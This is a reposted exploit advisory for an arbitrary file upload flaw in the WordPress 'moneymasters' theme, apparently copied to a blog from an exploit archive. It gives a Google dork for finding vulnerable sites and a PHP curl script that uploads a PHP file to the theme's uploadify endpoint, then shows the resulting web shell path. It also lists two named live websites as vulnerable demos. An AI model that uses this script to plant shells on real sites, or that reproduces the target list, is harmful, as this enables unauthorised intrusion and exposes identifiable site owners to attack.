Wordpress Themes moneymasters Arbitrary File Upload Vulnerability | BOT24

Wordpress Themes moneymasters Arbitrary File Upload Vulnerability

################################################## #####
# Author => Fayzoun
# Facebook => http://fb.me/fayzoun.no.love
# Facebook page => http://fb.me/fayzoun.AO
# Google Dork => inurl:/wp-content/themes/moneymasters
# Mail : fayzoun2@yahoo.fr / fayzoun@gmail.com
################################################## #
# Exploit:
<?php

$uploadfile="Fayzoun.php";
$ch = curl_init("http://www.vulnsite.com");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uploadfile",
'folder'=>'/wp-content/themes/moneymasters/code/uploadify/'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);

print "$postResult";
?>

Shell Access : http://localhost/wordpress/wp-content/themes/moneymasters/code/uploadify/random_name.php
-------------------
<?php
phpinfo();
?>
------------------------------

[#] Demos Vulnd sites :

http://themiza.com/wp-content/themes/moneymasters/code/uploadify/uploadify.php
http://www.vietbacsecurity.com/wp-content/themes/moneymasters/code/uploadify/uploadify.php
##################################################
Gretz To : .:: شهداء الأقصى ::. - Pal Snipre - The Wolf - Salem Hassine
Thanks To: God Allah





//The information contained within this publication is
//supplied "as-is"with no warranties or guarantees of fitness
//of use or otherwise. Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information
Share on Google Plus

About Bradley Susser

    Blogger Comment
    Facebook Comment

0 comments :

Post a Comment